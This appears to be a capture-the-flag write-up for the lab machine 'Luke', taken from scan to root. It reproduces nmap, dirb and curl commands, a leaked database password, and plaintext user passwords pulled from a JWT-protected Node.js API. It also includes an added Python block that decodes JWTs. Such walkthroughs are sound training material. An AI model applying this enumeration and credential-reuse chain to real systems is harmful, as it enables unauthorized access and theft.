As usual, the first step is to run Nmap against the host to identify the running services:

```
Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.13.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   40.68 ms 10.10.12.1
2   40.94 ms 10.10.10.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds
```
From that output we can see there are quite a few open ports. The first one I looked at was FTP, because it allows anonymous login.

```
root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).

Connecting to 10.10.10.137...
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...
Login successful.
Logged in to 10.10.10.137.
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !

Derry
ncftp /webapp >
```
As you can see, a single file is hosted over FTP: a txt file addressed to Chihiro. That seemed to be everything available on FTP. Next I decided to move on to port 80, browsing to 10.10.10.137 to see what was hosted there.

I was presented with a basic Bootstrap 4 page. Nothing was hidden in the source and there were no links off the page. I then ran dirb to find other directories and files hosted on the server.

```
root@kali:~/Documents/luke# dirb http://10.10.10.137

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/

---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3
```
A collection of directories was found. I also rescanned with dirbuster and found /login.php and config.php, which dirb had missed for some reason.

When I browsed to config.php, the following was returned:

```php
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
```
Now we have a username and password: root:Zk6heYCyv6ZE9Xcg. /management is the other notable find. When you browse to it, an HTTP Basic Authentication prompt is shown. For now there didn't seem to be anything else on port 80, so I moved on to port 3000.

Port 3000 appears to be hosting a NodeJS application. When you try to connect to it, you receive a JSON response:

```json
{"success":false,"message":"Auth token is not supplied"}
```

I ran dirb against port 3000 to try to find anything else.

```
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------

http://10.10.10.137:3000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/

--------------------------------
--------------------------------
```
All of these directories returned a JSON response very similar to the original one, indicating that you need to authenticate. After some investigation I found that the application is using JSON Web Tokens: you send a request containing a valid username and password to the authentication endpoint, the server responds with a token, and that token can then be used to authenticate to the application. After a lot of trial and error, I was able to generate a token with the following curl request:

```
root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#
```
As you can see, I used curl to send a POST request to http://10.10.10.137:3000/login. The POST body contained the username and password found on port 80, and the server responded with a token. I then used curl to send the token to the application.

```
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin ! "}
root@kali:/#
```
Once sent, the server displayed the message "Welcome admin ! ". I then sent the same token to the other directories on port 3000 that dirb had found.

```
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/#
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
```
You can see that the /users directory responded with a list of usernames: Admin, Derry, Yuri and Dory. The /users/admin directory responded with Admin's username and password: admin:WX5b7)>/rp$U)FW. I then sent the token to the other 3 users listed under /users.

```
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
```

So after all of that, I have 5 sets of credentials.
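As an added illustration (not part of the original write-up), the Python below decodes the token that the /login endpoint returned above. It shows that the header and payload are only base64url-encoded, so anything placed in them is readable by whoever holds the token, and it reproduces the HS256 check the server performs. The signing secret is not on the page, so `sign_hs256` and the secret it is tested with are constructed here purely for the round-trip check.

```python
import base64
import hashlib
import hmac
import json

# Token exactly as returned by the /login endpoint in the write-up above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9."
         "pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM")


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token: str) -> dict:
    """Split a compact JWS into its three parts and parse header and payload.
    No signature check happens here: these parts are encoded, not encrypted."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature": b64url_decode(sig_b64),
        "signing_input": f"{header_b64}.{payload_b64}".encode(),
    }


def lifetime_seconds(payload: dict) -> int:
    """Validity window the issuer granted (exp - iat), in seconds."""
    return payload["exp"] - payload["iat"]


def verify_hs256(token: str, secret: bytes) -> bool:
    """Server-side check: recompute HMAC-SHA256 over header.payload and
    compare in constant time. Only the holder of `secret` can do this."""
    parts = decode_jwt(token)
    if parts["header"].get("alg") != "HS256":  # pin the algorithm; never trust alg blindly
        return False
    expected = hmac.new(secret, parts["signing_input"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, parts["signature"])


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Constructed issuer helper (the box's signing code is not on the page)."""
    enc = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc({'alg': 'HS256', 'typ': 'JWT'})}.{enc(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"
```

Running `decode_jwt(TOKEN)` shows the payload `{"username":"admin","iat":1565779588,"exp":1565865988}`, a 24-hour window, and `verify_hs256(TOKEN, b"constructed-guess")` returns False because the real secret is unknown.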
I went back to /management on port 80 and tried each set of credentials in turn. The Derry user was able to log in. From here we have a directory listing of 3 different files: config.json, config.php and login.php. I opened config.json and the following was displayed:

You can see from this JSON output that we now have another root user password. I then moved on to explore port 8000.

This is software used to administer the server. I tried logging in with the 6 sets of credentials captured in the previous steps. The root login from config.json allowed me to log in to the page.

From there I spawned a web-browser terminal session on the machine. With access to that terminal I was able to grab both user.txt and root.txt to complete the machine.
# cd /root